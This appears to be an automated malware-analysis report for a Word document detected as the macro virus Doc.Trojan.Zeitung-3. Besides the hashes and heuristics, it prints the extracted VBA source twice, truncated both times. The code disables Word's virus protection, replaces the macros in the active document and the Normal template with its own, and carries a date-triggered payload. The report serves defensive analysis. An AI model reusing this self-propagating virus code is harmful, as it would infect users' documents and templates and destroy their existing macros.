Office (OLE) malware analysis — malicious · a54d976e2fcf6b0a

MALICIOUS

Office (OLE)

64.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 88682c07198598381525b00dad8a1c81 SHA-1: b3b94f68550a04700990be68a20f76b1c2db5a98 SHA-256: a54d976e2fcf6b0ae9c722d677b4b43d3200930246510fdea1776a77f4d1c65a

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is an OLE document containing a large VBA macro. Heuristics indicate the presence of macros and specifically a Document_Open macro, which is a common technique for executing malicious code upon document opening. The macro code attempts to infect the Normal template and the active document, suggesting an attempt at persistence or propagation. The ClamAV detection as 'Doc.Trojan.Zeitung-3' further confirms its malicious nature.

Heuristics 3

ClamAV: Doc.Trojan.Zeitung-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Zeitung-3
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 71266 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	71266 bytes
SHA-256: `5b38b9f3fbdbf92d0caac45d2651be1bbd8db3ce78f48dbe5e0bf83a012ed815`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Const E_Marker = "VirusZeitung" 'ñèãíàòóðà âèðóñà 'èó îäë:ÀêäéÔíðâêé ëêàä ôåî èàëØòëâ@Âðññçàè ðàè èàåñè,ÀåñíðÅðìâèÌõè ààî '1 'íîìåð 1 çà 2000 ãîä Dim ad, nt As Object Dim sd, snt As Boolean Private Function NormalKontam() If Not nt.codemodule.Find(E_Marker, 1, 1, 10000, 10000) Then NormalKontam = 0 Else If nt.codemodule.countoflines < 3 Then NormalKontam = 0 Else ant$ = Trim(nt.codemodule.lines(3, nt.codemodule.countoflines)) ant$ = Mid(ant$, 2, Len(ant$) - 1) If Val(Trim(ant$)) < 65535 Then NormalKontam = Val(Trim(ant$)) Else NormalKontam = -1 End If End If End If End Function Private Function ADokumKontam() If Not ad.codemodule.Find(E_Marker, 1, 1, 10000, 10000) Then ADokumKontam = 0 Else If ad.codemodule.countoflines < 3 Then ADokumKontam = 0 Else ant$ = Trim(ad.codemodule.lines(3, ad.codemodule.countoflines)) ant$ = Mid(ant$, 2, Len(ant$) - 1) If Val(Trim(ant$)) < 65535 Then ADokumKontam = Val(Trim(ant$)) Else ADokumKontam = -1 End If End If End If End Function Private Sub VirusArbeit() On Error Resume Next Options.VirusProtection = False Set nt = NormalTemplate.VBProject.VBComponents.Item(1) Set ad = ActiveDocument.VBProject.VBComponents.Item(1) If (ADokumKontam < NormalKontam) And ((ActiveDocument.SaveFormat = wdFormatDocument) Or (ActiveDocument.SaveFormat = wdFormatTemplate)) Then sd = ActiveDocument.Saved If ad.codemodule.countoflines > 0 Then Open "C:\" + ActiveDocument.ActiveWindow.Caption + ".TXT" For Append As #1 Print #1, "Ìàêðîñû, áûâøèå â äîêóìåíòå äî âíåäðåíèÿ âèðóñà" For v = 1 To ad.codumodule.countoflines Print #1, ad.codemodule.lines(v, 1) Next v Close #1 ad.codemodule.deletelines 1, ad.codemodule.countoflines End If For v = 1 To nt.codemodule.countoflines ad.codemodule.insertlines v, nt.codemodule.lines(v, 1) Next v If (sd = True) And (Mid(ActiveDocument.ActiveWindow.Caption, 1, 8) <> "Äîêóìåíò") Then ActiveDocument.Save End If If ADokumKontam > NormalKontam Then snt = NormalTemplate.Saved If nt.codemodule.countoflines > 0 Then Open "C:\NORMAL.TXT" For Append As #1 Print #1, "Ìàêðîñû, áûâøèå â øàáëîíå Normal.dot" For v = 1 To nt.codemodule.countoflines Print #1, nt.codemodule.lines(v, 1) Next v Close #1 nt.codemodule.deletelines 1, nt.codemodule.countoflines End If For v = 1 To ad.codemodule.countoflines nt.codemodule.insertlines v, ad.codemodule.lines(v, 1) Next v If snt = True Then NormalTemplate.Save End If Set nt = Nothing Set ad = Nothing End Sub Private Sub HauptArbeit(p) Tag$ = "" Monat$ = "" datum$ = Trim(Date) i = 1 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$)) Tag$ = Tag$ + Mid(datum$, i, 1) i = i + 1 Wend i = i + 1 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$)) Monat$ = Monat$ + Mid(datum$, i, 1) i = i + 1 Wend If (Val(Monat$) = 2) And (Val(Tag$) = 2) Then p = 2 End If If (Val(Monat$) = 3) And (Val(Tag$) = 21) Then p = 2 End If If (Val(Monat$) = 4) And (Val(Tag$) = 30) Then p = 2 End If If (Val(Monat$) = 6) And (Val(Tag$) = 21) Then p = 2 End If If (Val(Monat$) = 8) And (Val(Tag$) = 2) Then p = 2 End If If (Val(Monat$) = 9) And (Val(Tag$) = 21) Then p = 2 End If If (Val(Monat$) = 10) And (Val(Tag$) = 31) Then p = 2 End If If (Val(Monat$) = 12) And (Val(Tag$) = 21) Then p = 2 End If If Rnd >= p Then Exit Sub End If Z_Kopf Druck_0 Artikel_1$(1, 0), 18, True, wdAlignParagraphCenter, 0 Selection.TypeParagraph ab_ = 0 While Artikel_1$(2, ab_) <> "" Druck_0 Artikel_1$(2, ab_), 14, False, wdAlignParagraphJustify, 1.5 ab_ = ab_ + 1 Wend Selection.TypeParagraph Druck_0 A ... (truncated)

SHA-256: 5b38b9f3fbdbf92d0caac45d2651be1bbd8db3ce78f48dbe5e0bf83a012ed815

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const E_Marker = "VirusZeitung" 'ñèãíàòóðà âèðóñà
'èó îäë:ÀêäéÔíðâêé ëêàä ôåî  èàëØòëâ@Âðññçàè ðàè èàåñè,ÀåñíðÅðìâèÌõè ààî
'1
'íîìåð 1 çà 2000 ãîä
Dim ad, nt As Object
Dim sd, snt As Boolean
 
Private Function NormalKontam()
 If Not nt.codemodule.Find(E_Marker, 1, 1, 10000, 10000) Then
  NormalKontam = 0
 Else
  If nt.codemodule.countoflines < 3 Then
   NormalKontam = 0
  Else
   ant$ = Trim(nt.codemodule.lines(3, nt.codemodule.countoflines))
   ant$ = Mid(ant$, 2, Len(ant$) - 1)
   If Val(Trim(ant$)) < 65535 Then
    NormalKontam = Val(Trim(ant$))
   Else
    NormalKontam = -1
   End If
  End If
 End If
End Function

Private Function ADokumKontam()
 If Not ad.codemodule.Find(E_Marker, 1, 1, 10000, 10000) Then
  ADokumKontam = 0
 Else
  If ad.codemodule.countoflines < 3 Then
   ADokumKontam = 0
  Else
   ant$ = Trim(ad.codemodule.lines(3, ad.codemodule.countoflines))
   ant$ = Mid(ant$, 2, Len(ant$) - 1)
   If Val(Trim(ant$)) < 65535 Then
    ADokumKontam = Val(Trim(ant$))
   Else
    ADokumKontam = -1
   End If
  End If
 End If
End Function

Private Sub VirusArbeit()
 On Error Resume Next
 Options.VirusProtection = False
 Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
 Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
 If (ADokumKontam < NormalKontam) And ((ActiveDocument.SaveFormat = wdFormatDocument) Or (ActiveDocument.SaveFormat = wdFormatTemplate)) Then
  sd = ActiveDocument.Saved
  If ad.codemodule.countoflines > 0 Then
   Open "C:\" + ActiveDocument.ActiveWindow.Caption + ".TXT" For Append As #1
   Print #1, "Ìàêðîñû, áûâøèå â äîêóìåíòå äî âíåäðåíèÿ âèðóñà"
   For v = 1 To ad.codumodule.countoflines
    Print #1, ad.codemodule.lines(v, 1)
   Next v
   Close #1
   ad.codemodule.deletelines 1, ad.codemodule.countoflines
  End If
  For v = 1 To nt.codemodule.countoflines
   ad.codemodule.insertlines v, nt.codemodule.lines(v, 1)
  Next v
  If (sd = True) And (Mid(ActiveDocument.ActiveWindow.Caption, 1, 8) <> "Äîêóìåíò") Then ActiveDocument.Save
 End If
 
 If ADokumKontam > NormalKontam Then
  snt = NormalTemplate.Saved
  If nt.codemodule.countoflines > 0 Then
   Open "C:\NORMAL.TXT" For Append As #1
   Print #1, "Ìàêðîñû, áûâøèå â øàáëîíå Normal.dot"
   For v = 1 To nt.codemodule.countoflines
    Print #1, nt.codemodule.lines(v, 1)
   Next v
   Close #1
   nt.codemodule.deletelines 1, nt.codemodule.countoflines
  End If
  For v = 1 To ad.codemodule.countoflines
   nt.codemodule.insertlines v, ad.codemodule.lines(v, 1)
  Next v
  If snt = True Then NormalTemplate.Save
 End If
 Set nt = Nothing
 Set ad = Nothing
End Sub

Private Sub HauptArbeit(p)
 Tag$ = ""
 Monat$ = ""
 datum$ = Trim(Date)
 i = 1
 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
  Tag$ = Tag$ + Mid(datum$, i, 1)
  i = i + 1
 Wend
 i = i + 1
 While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
  Monat$ = Monat$ + Mid(datum$, i, 1)
  i = i + 1
 Wend
 
 If (Val(Monat$) = 2) And (Val(Tag$) = 2) Then
  p = 2
 End If
 If (Val(Monat$) = 3) And (Val(Tag$) = 21) Then
  p = 2
 End If
 If (Val(Monat$) = 4) And (Val(Tag$) = 30) Then
  p = 2
 End If
 If (Val(Monat$) = 6) And (Val(Tag$) = 21) Then
  p = 2
 End If
 If (Val(Monat$) = 8) And (Val(Tag$) = 2) Then
  p = 2
 End If
 If (Val(Monat$) = 9) And (Val(Tag$) = 21) Then
  p = 2
 End If
 If (Val(Monat$) = 10) And (Val(Tag$) = 31) Then
  p = 2
 End If
 If (Val(Monat$) = 12) And (Val(Tag$) = 21) Then
  p = 2
 End If
  
 If Rnd >= p Then
  Exit Sub
 End If
 Z_Kopf
 
 Druck_0 Artikel_1$(1, 0), 18, True, wdAlignParagraphCenter, 0
 Selection.TypeParagraph
 ab_ = 0
 While Artikel_1$(2, ab_) <> ""
  Druck_0 Artikel_1$(2, ab_), 14, False, wdAlignParagraphJustify, 1.5
  ab_ = ab_ + 1
 Wend
 Selection.TypeParagraph
 Druck_0 A
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.